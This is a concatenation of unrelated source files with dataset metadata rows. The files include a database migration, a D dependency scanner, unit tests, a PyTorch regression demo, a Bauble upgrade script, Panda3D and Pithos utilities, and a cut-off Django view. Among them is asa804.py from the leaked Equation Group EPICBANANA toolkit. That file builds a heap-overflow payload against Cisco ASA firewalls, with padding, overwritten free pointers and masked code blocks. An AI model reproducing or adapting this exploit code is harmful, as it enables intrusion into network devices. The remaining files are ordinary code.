consistencygroups.create_column(cgsnapshot_id)
consistencygroups.update().values(cgsnapshot_id=None).execute()
def downgrade(migrate_engine):
"""Remove cgsnapshot_id column from consistencygroups."""
meta = MetaData()
meta.bind = migrate_engine
consistencygroups = Table('consistencygroups', meta, autoload=True)
cgsnapshot_id = consistencygroups.columns.cgsnapshot_id
consistencygroups.drop_column(cgsnapshot_id)
| apache-2.0 | 5,296,566,347,016,533,000 | 36.054054 | 78 | 0.73523 | false |
DarthMaulware/EquationGroupLeaks | Leak #1 - Equation Group Cyber Weapons Auction - Invitation/EQGRP-Free-File/Firewall/EXPLOITS/EPBA/EPICBANANA/versions/asa804.py | 1 | 2673 | from params import *
from util import *
from asa804_loader import *
def payload(params):
block_enc = []
while len(block_enc) == 0:
mask_byte = ord(rand_byte()) # one byte, used as an int
#print "trying to mask data with 0x%02x" % mask_byte
block_enc = prepare_blocks(params, mask_byte,
block1_decoder, cleanup, block_decoder, blocks_table, epba_exit,
free_addrs, block)
if block_enc == False:
print "failed to prepare blocks!"
return ""
# prepare the payload
payload = ""
# drop 413 bytes for overflow to offset 1372 in getline
# sequence is K-Y-Y-Y-Y
# 15 blocks of free memory, 13 for code
# We pad with 0x08 here so that 4 bytes of padding is
# a valid address.
payload += ctrl_v_escape("\x08" * 242)
payload += ctrl_v_escape(valid_prev) # new prev
payload += ctrl_v_escape(neg_index) # -20
payload += ctrl_v_escape(neg_index) # -20
payload += ctrl_v_escape(free_addrs[0]) # where blob drops
payload += ctrl_v_escape(free_addrs[1]) # first real code drops here
payload += ctrl_v_escape(free_addrs[2])
payload += ctrl_v_escape(free_addrs[3])
payload += ctrl_v_escape(free_addrs[4])
payload += ctrl_v_escape(free_addrs[5])
payload += ctrl_v_escape(free_addrs[6])
payload += ctrl_v_escape(free_addrs[7])
payload += ctrl_v_escape(free_addrs[8])
payload += ctrl_v_escape(free_addrs[9])
payload += ctrl_v_escape(free_addrs[10])
payload += ctrl_v_escape(free_addrs[11])
payload += ctrl_v_escape(free_addrs[12])
payload += ctrl_v_escape(free_addrs[13]) # last real code
payload += ctrl_v_escape(free_addrs[14]) # overwrite the free ptr
payload += ctrl_v_escape("\x08" * 99)
payload += OVERWRITE + KILL + (YANK * 4) + LINEFEED
payload += ctrl_v_escape(block_enc[1]) + LINEFEED
payload += ctrl_v_escape(block_enc[2]) + LINEFEED
payload += ctrl_v_escape(block_enc[3]) + LINEFEED
payload += ctrl_v_escape(block_enc[4]) + LINEFEED
payload += ctrl_v_escape(block_enc[5]) + LINEFEED
payload += ctrl_v_escape(block_enc[6]) + LINEFEED
payload += ctrl_v_escape(block_enc[7]) + LINEFEED
payload += ctrl_v_escape(block_enc[8]) + LINEFEED
payload += ctrl_v_escape(block_enc[9]) + LINEFEED
payload += ctrl_v_escape(block_enc[10]) + LINEFEED
payload += ctrl_v_escape(block_enc[11]) + LINEFEED
payload += ctrl_v_escape(block_enc[12]) + LINEFEED
payload += ctrl_v_escape(block_enc[13]) + LINEFEED
payload += ctrl_v_escape(block_enc[14]) + LINEFEED
return(payload)
| unlicense | -5,213,213,743,489,663,000 | 40.123077 | 99 | 0.617284 | false |
blablack/ams-lv2 | waflib/Tools/d_scan.py | 16 | 5052 | #!/usr/bin/env python
# encoding: utf-8
# Thomas Nagy, 2016-2018 (ita)
"""
Provide a scanner for finding dependencies on d files
"""
import re
from waflib import Utils
def filter_comments(filename):
"""
:param filename: d file name
:type filename: string
:rtype: list
:return: a list of characters
"""
txt = Utils.readf(filename)
i = 0
buf = []
max = len(txt)
begin = 0
while i < max:
c = txt[i]
if c == '"' or c == "'": # skip a string or character literal
buf.append(txt[begin:i])
delim = c
i += 1
while i < max:
c = txt[i]
if c == delim:
break
elif c == '\\': # skip the character following backslash
i += 1
i += 1
i += 1
begin = i
elif c == '/': # try to replace a comment with whitespace
buf.append(txt[begin:i])
i += 1
if i == max:
break
c = txt[i]
if c == '+': # eat nesting /+ +/ comment
i += 1
nesting = 1
c = None
while i < max:
prev = c
c = txt[i]
if prev == '/' and c == '+':
nesting += 1
c = None
elif prev == '+' and c == '/':
nesting -= 1
if nesting == 0:
break
c = None
i += 1
elif c == '*': # eat /* */ comment
i += 1
c = None
while i < max:
prev = c
c = txt[i]
if prev == '*' and c == '/':
break
i += 1
elif c == '/': # eat // comment
i += 1
while i < max and txt[i] != '\n':
i += 1
else: # no comment
begin = i - 1
continue
i += 1
begin = i
buf.append(' ')
else:
i += 1
buf.append(txt[begin:])
return buf
class d_parser(object):
"""
Parser for d files
"""
def __init__(self, env, incpaths):
#self.code = ''
#self.module = ''
#self.imports = []
self.allnames = []
self.re_module = re.compile("module\s+([^;]+)")
self.re_import = re.compile("import\s+([^;]+)")
self.re_import_bindings = re.compile("([^:]+):(.*)")
self.re_import_alias = re.compile("[^=]+=(.+)")
self.env = env
self.nodes = []
self.names = []
self.incpaths = incpaths
def tryfind(self, filename):
"""
Search file a file matching an module/import directive
:param filename: file to read
:type filename: string
"""
found = 0
for n in self.incpaths:
found = n.find_resource(filename.replace('.', '/') + '.d')
if found:
self.nodes.append(found)
self.waiting.append(found)
break
if not found:
if not filename in self.names:
self.names.append(filename)
def get_strings(self, code):
"""
:param code: d code to parse
:type code: string
:return: the modules that the code uses
:rtype: a list of match objects
"""
#self.imports = []
self.module = ''
lst = []
# get the module name (if present)
mod_name = self.re_module.search(code)
if mod_name:
self.module = re.sub('\s+', '', mod_name.group(1)) # strip all whitespaces
# go through the code, have a look at all import occurrences
# first, lets look at anything beginning with "import" and ending with ";"
import_iterator = self.re_import.finditer(code)
if import_iterator:
for import_match in import_iterator:
import_match_str = re.sub('\s+', '', import_match.group(1)) # strip all whitespaces
# does this end with an import bindings declaration?
# (import bindings always terminate the list of imports)
bindings_match = self.re_import_bindings.match(import_match_str)
if bindings_match:
import_match_str = bindings_match.group(1)
# if so, extract the part before the ":" (since the module declaration(s) is/are located there)
# split the matching string into a bunch of strings, separated by a comma
matches = import_match_str.split(',')
for match in matches:
alias_match = self.re_import_alias.match(match)
if alias_match:
# is this an alias declaration? (alias = module name) if so, extract the module name
match = alias_match.group(1)
lst.append(match)
return lst
def start(self, node):
"""
The parsing starts here
:param node: input file
:type node: :py:class:`waflib.Node.Node`
"""
self.waiting = [node]
# while the stack is not empty, add the dependencies
while self.waiting:
nd = self.waiting.pop(0)
self.iter(nd)
def iter(self, node):
"""
Find all the modules that a file depends on, uses :py:meth:`waflib.Tools.d_scan.d_parser.tryfind` to process dependent files
:param node: input file
:type node: :py:class:`waflib.Node.Node`
"""
path = node.abspath() # obtain the absolute path
code = "".join(filter_comments(path)) # read the file and filter the comments
names = self.get_strings(code) # obtain the import strings
for x in names:
# optimization
if x in self.allnames:
continue
self.allnames.append(x)
# for each name, see if it is like a node or not
self.tryfind(x)
def scan(self):
"look for .d/.di used by a d file"
env = self.env
gruik = d_parser(env, self.generator.includes_nodes)
node = self.inputs[0]
gruik.start(node)
nodes = gruik.nodes
names = gruik.names
return (nodes, names)
| gpl-2.0 | 8,168,800,896,246,255,000 | 22.943128 | 126 | 0.60669 | false |
krzykwas/rhqagent | pyagent/test/data/model/PastMeasurementsManagerTest.py | 1 | 3503 | #-*- coding: utf-8 -*-
#
# Krzysztof „krzykwas” Kwaśniewski
# Gdańsk, 15-07-2012
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from ....data.model.Measurement import Measurement
from ....data.model.PastMeasurementsManager import PastMeasurementsManager
import unittest
class PastMeasurementsManagerTest(unittest.TestCase):
def setUp(self):
self.__PERIOD = 3
self.__sut = PastMeasurementsManager(self.__PERIOD)
def test_get_InvokedOnEmptyManager_ReturnsAListOfCorrectLength(self):
actual = len(self.__sut.get("srcServer", "mappedObject"))
self.assertEqual(3, actual, "List of wrong length returned")
def test_get_WhenOneMeasurementMissing_AFakeOneIsCreatedWithDataProperlyCopiedFromTheOldestOne(self):
srcServer = "srcServer"
mappedObject = "mappedObject"
mapping1 = "dst-server-mapping-1"
mapping2 = "dst-server-mapping-2"
timestamp1 = "timestamp-1"
timestamp2 = "timestamp-2"
#This measurement is added first, so it's the oldest one!
measurement1 = Measurement(srcServer, mappedObject, mapping1, 0, timestamp1)
self.__sut.put(srcServer, mappedObject, measurement1)
measurement2 = Measurement(srcServer, mappedObject, mapping2, 0, timestamp2)
self.__sut.put(srcServer, mappedObject, measurement2)
fakeMeasurement = self.__sut.get(srcServer, mappedObject)[-1]
self.assertEqual(
mapping1,
fakeMeasurement.getDstServerMapping(),
"dstServerMapping value: {0} incorrectly copied to fake measurement".format(fakeMeasurement.getDstServerMapping())
)
self.assertEqual(
timestamp1,
fakeMeasurement.getTimestamp(),
"timestamp value: {0} incorrectly copied to fake measurement".format(fakeMeasurement.getTimestamp())
)
def test_put_WhenFirstMeasurementAddedForCertainSrcServerAndMappedObject_NoExceptionRaised(self):
try:
self.__sut.put("srcServer", "mappedObject", "measurement")
except Exception as e:
self.fail("Exception {0} raised unexpectedly".format(e))
def test_put_WhenMoreThanPeriodMeasurementsAdded_OldestGetForgotten(self):
srcServer = "srcServer"
mappedObject = "mappedObject"
#measurement1 is the oldest one!
measurement1 = Measurement(srcServer, mappedObject, "dstServerMapping1", 1, "timestamp1")
measurement2 = Measurement(srcServer, mappedObject, "dstServerMapping2", 2, "timestamp2")
measurement3 = Measurement(srcServer, mappedObject, "dstServerMapping3", 3, "timestamp3")
measurement4 = Measurement(srcServer, mappedObject, "dstServerMapping4", 4, "timestamp4")
self.__sut.put(srcServer, mappedObject, measurement1)
self.__sut.put(srcServer, mappedObject, measurement2)
self.__sut.put(srcServer, mappedObject, measurement3)
self.__sut.put(srcServer, mappedObject, measurement4)
expected = [measurement4, measurement3, measurement2]
actual = self.__sut.get(srcServer, mappedObject)
self.assertListEqual(expected, actual, "Incorrect measurements returned")
| gpl-3.0 | 2,079,253,867,258,000,000 | 38.738636 | 117 | 0.76294 | false |
hehewa/pytorchStudy | methods_exist/Regression/REGRESSION.py | 1 | 1796 | #!/usr/bin/env python
from __future__ import print_function
from itertools import count
import torch
import torch.autograd
import torch.nn.functional as F
from torch.autograd import Variable
import matplotlib.pyplot as plt
import numpy as np
POLY_DEGREE = 4
W_target = torch.randn(POLY_DEGREE, 1) * 5
b_target = torch.randn(1) * 5
def make_features(x):
"""Builds features i.e. a matrix with columns [x, x^2, x^3, x^4]."""
x = x.unsqueeze(1) # the function unsqueeze is going to make x as a matrix
return torch.cat([x ** i for i in range(1, POLY_DEGREE+1)], 1)
def f(x):
"""Approximated function."""
return x.mm(W_target) + b_target[0]
def poly_desc(W, b):
"""Creates a string description of a polynomial."""
result = 'y = '
for i, w in enumerate(W):
result += '{:+.2f} x^{} '.format(w, len(W) - i)
result += '{:+.2f}'.format(b[0])
return result
def get_batch(batch_size=32):
"""Builds a batch i.e. (x, f(x)) pair."""
random = torch.randn(batch_size)
x = make_features(random)
y = f(x)
return Variable(x), Variable(y)
# Define model
fc = torch.nn.Linear(W_target.size(0), 1)
for batch_idx in count(1):
# Get data
batch_x, batch_y = get_batch()
# Reset gradients
fc.zero_grad()
# Forward pass
output = F.smooth_l1_loss(fc(batch_x), batch_y)
loss = output.data[0]
# Backward pass
output.backward()
# Apply gradients
for param in fc.parameters():
param.data.add_(-0.1 * param.grad.data)
# Stop criterion
if loss < 1e-3:
break
print('Loss: {:.6f} after {} batches'.format(loss, batch_idx))
print('==> Learned function:\t' + poly_desc(fc.weight.data.view(-1), fc.bias.data))
print('==> Actual function:\t' + poly_desc(W_target.view(-1), b_target)) | apache-2.0 | -5,541,937,584,037,717,000 | 23.958333 | 83 | 0.625278 | false |
Bauble/bauble.classic | scripts/bauble-upgrade-0.6-to-0.7.py | 3 | 5641 | #!/usr/bin/env python
# this script needs both a connections to a database created with bauble 0.6.x
# and the csv files exported from the same database, it will create a directory
# called 0.7 in the same directory as the exported csv files with the new
# converted files...you will also need the default geography data to have
# functioning database
# What has changed from 0.6->0.7 ?
# ------------------
# - species.id_qual column is now accession.id_qual column, any species
# specific id_qual data should be moved to the accessions with that species
# - accession.country_id is now accession.geography_id, try to find a match
# for the country_id if there is one in the geography table
# - species_meta is no more, this means that all the previous distribution data
# won't match up, it would be good if we could find a string match and add this
# to the new species_distribution table
import csv
import os
import shutil
import sys
from optparse import OptionParser
from bauble.plugins.geography import *
from migrate.run import *
from sqlalchemy import *
import bauble
from bauble.plugins.plants import *
#import bauble.pluginmgr as pluginmgr
parser = OptionParser()
parser.add_option('-c', '--conn', dest='conn', help='the db connection uri',
metavar='CONN')
(options, args) = parser.parse_args()
if options.conn is None:
parser.error('a database uri is required')
# a directory full of CSV text files exported from Bauble 0.6
src_path = None
print args
if len(args) == 0:
src_path = os.getcwd()
else:
src_path = args[0]
if not os.path.exists(src_path):
parser.error('%s does not exist' % src_path)
# where to put the new files
dst_path = os.path.join(src_path, '0.7')
if not os.path.exists(dst_path):
os.mkdir(dst_path)
global_connect(options.conn)
engine = default_metadata.engine
session = create_session()
major, minor, rev = bauble.version
if minor != 6:
print '** Error: This script will only upgrade from bauble 0.6'
sys.exit(1)
def quote(s):
if s is None:
return ''
elif isinstance(s, (str, unicode)):
return '"%s"' % s
return '%s' % s
QUOTE_STYLE = csv.QUOTE_MINIMAL
QUOTE_CHAR = '"'
def write_csv(filename, rows):
f = file(filename, 'wb')
writer = csv.writer(f, quotechar=QUOTE_CHAR, quoting=QUOTE_STYLE)
writer.writerows(rows)
f.close()
def migrate_idqual():
print 'migrating idqual'
# select all species that have idqual set
#species = species.select(id_qual != None)
sp_results = select([species_table.c.id, species_table.c.id_qual],
species_table.c.id_qual != None).execute()
# print sp_results
acc_cols = accession_table.c.keys()
new_cols = acc_cols[:]
new_cols.append('id_qual')
rows = []
rows.append(new_cols)
# copy the accessions whose species have id_qual
for sp_id, sp_idqual in sp_results:
for acc in accession_table.select(accession_table.c.species_id==sp_id).execute():
v = [acc[c] for c in acc_cols]
v.append('%s' % sp_idqual)
rows.append(v)
# copy the rest of the accessions that don't have id_qau
sp_results = select([species_table.c.id],
species_table.c.id_qual == None)
for acc in accession_table.select(accession_table.c.species_id.in_(sp_results)).execute():
v = [acc[c] for c in acc_cols]
v.append(None)
rows.append(v)
write_csv(os.path.join(dst_path, 'accession.txt'), rows)
# copy the species and remove the id_qaul column
rows = []
sp_cols = species_table.c.keys()
sp_cols.remove('id_qual')
rows.append(sp_cols)
for sp in species_table.select().execute():
v = [sp[c] for c in sp_cols]
rows.append(v)
write_csv(os.path.join(dst_path, 'species.txt'), rows)
def migrate_distribution():
# TODO: this would need to connect to a 0.7 database to search
# for matching distribution data
# *** we could just start over with the distribution data and forget about
# trying to migrate it
pass
def migrate_accession_geography():
pass
# r = session.query(Accession).select(accession_table.c.country_id!=None)
# assert len(r) == 0
# TODO: update bauble meta
# TODO: create a registry
# TODO: it might make more sense to make some of the changes and then dump the
# data to and import it again to make sure things like the meta table and
# registry are created correctly
# TODO: the other options is to create a select statement that will create
# the columns we want to import
# TODO: how to use this script...export all tables from bauble first,
# This script will :
# 1. Create some CSV text files for importing into a Bauble 0.7
# database
# 2. Copy the rest of the CSV text files from a source directory into a
# destination that should also be imported into a new Bauble 0.7 database
#
# Basically this script will create a directory full of CSV files that
# can be imported into a Bauble 0.7 database.
# run this script and use the files it outputs in place of the ones from
migrate_accession_geography()
migrate_idqual()
migrate_distribution()
copy_list = ['donor.txt', 'family_synonym.txt', 'family.txt',
'species_synonym.txt', 'genus_synonym.txt', 'genus.txt',
'collection.txt', 'tagged_obj.txt', 'location.txt', 'tag.txt',
'verification.txt', 'default_vernacular_name.txt',
'plant_history.txt', 'vernacular_name.txt', 'donation.txt',
'plant.txt']
for f in copy_list:
print 'copying %s' % f
shutil.copy(os.path.join(src_path, f), dst_path)
| gpl-2.0 | 5,320,437,833,767,806,000 | 30.870056 | 94 | 0.674349 | false |
silly-wacky-3-town-toon/SOURCE-COD | Panda3D-1.10.0/direct/showbase/CountedResource.py | 11 | 7016 |
class CountedResource(object):
"""
This class is an attempt to combine the RAIA idiom with reference
counting semantics in order to model shared resources. RAIA stands
for "Resource Allocation Is Acquisition" (see 'Effective C++' for a
more in-depth explanation)
When a resource is needed, create an appropriate CountedResource
object. If the resource is already available (meaning another
CountedResource object of the same type already exists), no action
is taken. Otherwise, acquire() is invoked, and the resource is
allocated. The resource will remain valid until all matching
CountedResource objects have been deleted. When no objects of
a particular CountedResource type exist, the release() function for
that type is invoked and the managed resource is cleaned up.
Usage:
Define a subclass of CountedResource that defines the
@classmethods acquire() and release(). In these two
functions, define your resource allocation and cleanup code.
IMPORTANT:
If you define your own __init__ and __del__ methods, you
MUST be sure to call down to the ones defined in
CountedResource.
Notes:
Until we figure out a way to wrangle a bit more functionality
out of Python, you MUST NOT inherit from any class that has
CountedResource as its base class. In debug mode, this will
raise a runtime assertion during the invalid class's call to
__init__(). If you have more than one resource that you want to
manage/access with a single object, you should subclass
CountedResource again. See the example code at the bottom of
this file to see how to accomplish this (This is useful for
dependent resources).
"""
@classmethod
def incrementCounter(cls):
try:
cls.RESOURCE_COUNTER += 1
except AttributeError:
cls.RESOURCE_COUNTER = 1
if cls.RESOURCE_COUNTER == 1:
cls.acquire()
@classmethod
def decrementCounter(cls):
try:
cls.RESOURCE_COUNTER_INIT_FAILED
del cls.RESOURCE_COUNTER_INIT_FAILED
except AttributeError:
cls.RESOURCE_COUNTER -= 1
if cls.RESOURCE_COUNTER < 1:
cls.release()
@classmethod
def getCount(cls):
return cls.RESOURCE_COUNTER
@classmethod
def acquire(cls):
pass
@classmethod
def release(cls):
pass
def __init__(self):
cls = type(self)
cls.RESOURCE_COUNTER_INIT_FAILED = True
assert cls.mro()[1] == CountedResource, \
(lambda: \
'%s cannot be subclassed.' \
% cls.mro()[list(cls.mro()).index(CountedResource) - 1].__name__)()
del cls.RESOURCE_COUNTER_INIT_FAILED
self.incrementCounter()
def __del__(self):
self.decrementCounter()
if __debug__ and __name__ == '__main__':
class MouseResource(CountedResource):
"""
A simple class to demonstrate the acquisition of a resource.
"""
@classmethod
def acquire(cls):
# The call to the super-class's acquire() is
# not necessary at the moment, but may be in
# the future, so do it now for good measure.
super(MouseResource, cls).acquire()
# Now acquire the resource this class is
# managing.
print '-- Acquire Mouse'
@classmethod
def release(cls):
# First, release the resource this class is
# managing.
print '-- Release Mouse'
# The call to the super-class's release() is
# not necessary at the moment, but may be in
# the future, so do it now for good measure.
super(MouseResource, cls).release()
def __init__(self):
super(MouseResource, self).__init__()
def __del__(self):
super(MouseResource, self).__del__()
class CursorResource(CountedResource):
"""
A class to demonstrate how to implement a dependent
resource. Notice how this class also inherits from
CountedResource. Instead of subclassing MouseCounter,
we will just acquire it in our __init__() and release
it in our __del__().
"""
@classmethod
def acquire(cls):
super(CursorResource, cls).acquire()
print '-- Acquire Cursor'
@classmethod
def release(cls):
print '-- Release Cursor'
super(CursorResource, cls).release()
def __init__(self):
# The required resource references should
# be stored on 'self' since we want to
# release it when the object is deleted.
self.__mouseResource = MouseResource()
# Call the super-classes __init__()
# after all required resources are
# referenced.
super(CursorResource, self).__init__()
def __del__(self):
# Free up the most dependent resource
# first, the one this class is managing.
super(CursorResource, self).__del__()
# Now unlink any required resources.
del self.__mouseResource
class InvalidResource(MouseResource):
@classmethod
def acquire(cls):
super(InvalidResource, cls).acquire()
print '-- Acquire Invalid'
@classmethod
def release(cls):
print '-- Release Invalid'
super(InvalidResource, cls).release()
print '\nAllocate Mouse'
m = MouseResource()
print 'Free up Mouse'
del m
print '\nAllocate Cursor'
c = CursorResource()
print 'Free up Cursor'
del c
print '\nAllocate Mouse then Cursor'
m = MouseResource()
c = CursorResource()
print 'Free up Cursor'
del c
print 'Free up Mouse'
del m
print '\nAllocate Mouse then Cursor'
m = MouseResource()
c = CursorResource()
print 'Free up Mouse'
del m
print 'Free up Cursor'
del c
print '\nAllocate Cursor then Mouse'
c = CursorResource()
m = MouseResource()
print 'Free up Mouse'
del m
print 'Free up Cursor'
del c
print '\nAllocate Cursor then Mouse'
c = CursorResource()
m = MouseResource()
print 'Free up Cursor'
del c
# example of an invalid subclass
try:
print '\nAllocate Invalid'
i = InvalidResource()
print 'Free up Invalid'
except AssertionError,e:
print e
print
print 'Free up Mouse'
del m
def demoFunc():
print '\nAllocate Cursor within function'
c = CursorResource()
print 'Cursor will be freed on function exit'
demoFunc()
| apache-2.0 | 5,393,298,083,505,471,000 | 29.504348 | 84 | 0.585946 | false |
cstavr/synnefo | snf-pithos-app/pithos/api/manage_accounts/__init__.py | 10 | 15419 | # Copyright (C) 2010-2014 GRNET S.A.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import re
import os
from functools import wraps
os.environ['DJANGO_SETTINGS_MODULE'] = 'synnefo.settings'
from pithos.api.util import (get_backend, split_container_object_string,
Checksum, NoChecksum)
def data_read_iterator(str, size=1024):
offset = 0
while True:
data = str[offset:offset + size]
offset = offset + size
if not data:
break
yield data
def manage_transactions(lock_container_path=False):
"""Decorator function for ManageAccounts methods."""
def decorator(func):
@wraps(func)
def wrapper(self, *args, **kwargs):
self.backend.pre_exec(lock_container_path)
try:
result = func(self, *args, **kwargs)
except:
self.backend.post_exec(False)
raise
else:
dry = kwargs.get('dry', False)
if dry:
self.backend.post_exec(False)
else:
self.backend.post_exec(True)
return result
return wrapper
return decorator
class ManageAccounts():
def __init__(self):
self.backend = get_backend()
def cleanup(self):
self.backend.close()
def _existing_accounts(self):
l = sorted([path for path, _ in self.backend.node.node_accounts()])
return l
@manage_transactions()
def existing_accounts(self):
return self._existing_accounts()
@manage_transactions()
def duplicate_accounts(self):
accounts = self._existing_accounts()
duplicates = []
for i in range(len(accounts)):
account = accounts[i]
matcher = re.compile(account, re.IGNORECASE)
duplicate = filter(matcher.match, (i for i in accounts[i + 1:] if
len(i) == len(account)))
if duplicate:
duplicate.insert(0, account)
duplicates.append(duplicate)
return duplicates
def _list_all_containers(self, account, step=10):
containers = []
marker = None
while 1:
more = self.backend.list_containers(account, account, limit=10,
marker=marker)
if not more:
break
containers.extend(more)
marker = more[-1]
return containers
@manage_transactions()
def list_all_containers(self, account, step=10):
return self._list_all_containers(account, step)
def _list_all_container_objects(self, account, container, virtual=False):
objects = []
marker = None
while 1:
more = self.backend.list_objects(account, account, container,
marker=marker, virtual=virtual)
if not more:
break
objects.extend((i[0] for i in more))
marker = more[-1][0]
return objects
@manage_transactions()
def list_all_container_objects(self, account, container, virtual=False):
return self._list_all_container_objects(account, container, virtual)
def _list_all_objects(self, account, virtual=False):
containers = self._list_all_containers(account)
objects = []
extend = objects.extend
for c in containers:
more = self._list_all_container_objects(account, c,
virtual=virtual)
extend([os.path.join(c, i) for i in more])
return objects
@manage_transactions()
def list_all_objects(self, account, virtual=False):
return self._list_all_objects(account, virtual)
def _list_past_versions(self, account, container, name):
versions = self.backend.list_versions(account, account, container,
name)
# do not return the current version
return list(x[0] for x in versions[:-1])
@manage_transactions()
def list_past_versions(self, account, container, name):
return self._list_past_versions(account, container, name)
@manage_transactions(lock_container_path=True)
def move_object(self, src_account, src_container, src_name, dest_account,
dry=True, silent=False):
if src_account not in self._existing_accounts():
raise NameError('%s does not exist' % src_account)
if dest_account not in self._existing_accounts():
raise NameError('%s does not exist' % dest_account)
trans = self.backend.wrapper.conn.begin()
try:
self._copy_object(src_account, src_container, src_name,
dest_account, move=True)
if dry:
if not silent:
print "Skipping database commit."
trans.rollback()
else:
trans.commit()
if not silent:
print "%s is deleted." % src_account
except:
trans.rollback()
raise
def _copy_object(self, src_account, src_container, src_name,
dest_account, move=False):
path = os.path.join(src_container, src_name)
fullpath = os.path.join(src_account, path)
dest_container = src_container
dest_name = src_name
meta = self.backend.get_object_meta(src_account, src_account,
src_container, src_name, 'pithos',
version=None)
content_type = meta.get('type')
# get source object history
versions = self._list_past_versions(src_account, src_container,
src_name)
# get source object permissions
permissions = self.backend.permissions.access_get(fullpath)
# get source object public
public = self.backend.get_object_public(src_account, src_account,
src_container, src_name)
if dest_container in self.backend.list_containers(dest_account,
dest_account):
# Note: if dest_container contains an object with the same name
# a new version with the contents of the source object will be
# created and the one in the destination container will pass to
# history
self.backend.copy_object(dest_account, src_account, src_container,
src_name, dest_account, dest_container,
dest_name, content_type, 'pithos',
meta={}, replace_meta=False,
permissions=permissions)
else:
# create destination container and retry
self.backend.put_container(dest_account, dest_account,
dest_container)
self.backend.copy_object(dest_account, src_account, src_container,
src_name, dest_account, dest_container,
dest_name, content_type, 'pithos',
meta={}, replace_meta=False,
permissions=permissions)
if move:
self.backend.delete_object(src_account, src_account,
src_container, src_name)
dest_path, dest_node = self.backend._lookup_object(dest_account,
dest_container,
dest_name)
assert dest_path == '/'.join([dest_account, path])
# turn history versions to point to the newly created node
for serial in versions:
self.backend.node.version_put_property(serial, 'node', dest_node)
if public:
# set destination object public
fullpath = '/'.join([dest_account, dest_container, dest_name])
self.backend.permissions.public_set(
fullpath,
self.backend.public_url_security,
self.backend.public_url_alphabet
)
def _merge_account(self, src_account, dest_account, delete_src=False):
# TODO: handle exceptions
# copy all source objects
for path in self._list_all_objects(src_account):
src_container, src_name = split_container_object_string(
'/%s' % path)
# give read permissions to the dest_account
permissions = self.backend.get_object_permissions(
src_account, src_account, src_container, src_name)
if permissions:
permissions = permissions[2]
permissions['read'] = permissions.get('read', [])
permissions['read'].append(dest_account)
self.backend.update_object_permissions(src_account,
src_account,
src_container,
src_name,
permissions)
self._copy_object(src_account, src_container, src_name,
dest_account, move=delete_src)
# move groups also
groups = self.backend.get_account_groups(src_account, src_account)
(v.replace(src_account, dest_account) for v in groups.values())
self.backend.update_account_groups(dest_account, dest_account,
groups)
if delete_src:
self._delete_account(src_account)
@manage_transactions(lock_container_path=True)
def merge_account(self, src_account, dest_account, only_stats=True,
dry=True, silent=False, delete_src=False):
if src_account not in self._existing_accounts():
raise NameError('%s does not exist' % src_account)
if dest_account not in self._existing_accounts():
raise NameError('%s does not exist' % dest_account)
if only_stats:
print "The following %s's entries will be moved to %s:" \
% (src_account, dest_account)
print "Objects: %r" % self._list_all_objects(src_account)
print "Groups: %r" \
% self.backend.get_account_groups(src_account,
src_account).keys()
return
self._merge_account(src_account, dest_account, delete_src)
trans = self.backend.wrapper.conn.begin()
try:
self._merge_account(src_account, dest_account, delete_src)
if dry:
if not silent:
print "Skipping database commit."
trans.rollback()
else:
trans.commit()
if not silent:
msg = "%s merged into %s."
print msg % (src_account, dest_account)
except:
trans.rollback()
raise
def _delete_container_contents(self, account, container):
self.backend.delete_container(account, account, container,
delimiter='/')
@manage_transactions(lock_container_path=True)
def delete_container_contents(self, account, container):
return self._delete_container(account, account, container,
delimiter='/')
def _delete_container(self, account, container):
self.backend.delete_container(account, account, container)
@manage_transactions(lock_container_path=True)
def delete_container(self, account, container):
self._delete_container(account, account, container)
def _delete_account(self, account):
for c in self._list_all_containers(account):
self._delete_container_contents(account, c)
self._delete_container(account, c)
self.backend.delete_account(account, account)
@manage_transactions(lock_container_path=True)
def delete_account(self, account, only_stats=True, dry=True, silent=False):
if account not in self._existing_accounts():
raise NameError('%s does not exist' % account)
if only_stats:
print "The following %s's entries will be removed:" % account
print "Objects: %r" % self._list_all_objects(account)
print "Groups: %r" \
% self.backend.get_account_groups(account, account).keys()
return
self._delete_account(account)
trans = self.backend.wrapper.conn.begin()
try:
self._delete_account(account)
if dry:
if not silent:
print "Skipping database commit."
trans.rollback()
else:
trans.commit()
if not silent:
print "%s is deleted." % account
except:
trans.rollback()
raise
@manage_transactions(lock_container_path=True)
def create_account(self, account):
return self.backend._lookup_account(account, create=True)
@manage_transactions(lock_container_path=True)
def create_update_object(self, account, container, name, content_type,
data, meta=None, permissions=None,
request_user=None,
checksum_compute_class=NoChecksum):
meta = meta or {}
permissions = permissions or {}
assert checksum_compute_class in (
NoChecksum, Checksum), 'Invalid checksum_compute_class'
checksum_compute = checksum_compute_class()
size = 0
hashmap = []
for block_data in data_read_iterator(data, self.backend.block_size):
size += len(block_data)
hashmap.append(self.backend.put_block(block_data))
checksum_compute.update(block_data)
checksum = checksum_compute.hexdigest()
request_user = request_user or account
return self.backend.update_object_hashmap(request_user, account,
container, name, size,
content_type, hashmap,
checksum, 'pithos', meta,
True, permissions)
| gpl-3.0 | 2,453,471,580,110,344,000 | 39.576316 | 79 | 0.541215 | false |
Starbow/StarbowWebSite | starbowmodweb/streams/views.py | 1 | 1876 | from django.shortcuts import render_to_response
from django.contrib.auth.decorators import login_required
from django.template import RequestContext
from starbowmodweb.streams.models import StreamInfo
from starbowmodweb.streams.forms import AddStreamForm
@login_required
def edit_stream(request):
messages = []
# previous stream_info data or None, if not available
stream_info = StreamInfo.objects.filter(user=request.user).first()
if request.method == 'POST': # If the form has been submitted...
form = AddStreamForm(request.POST, instance=stream_info) # A form bound to the POST data
if form.is_valid():
if 'edit' in request.POST:
# add/edit stream
stream_info = form.save(commit=False)
stream_info.user = request.user
stream_info.save()
messages.append('Your stream was added/edited succesfully.')
elif 'delete' in request.POST:
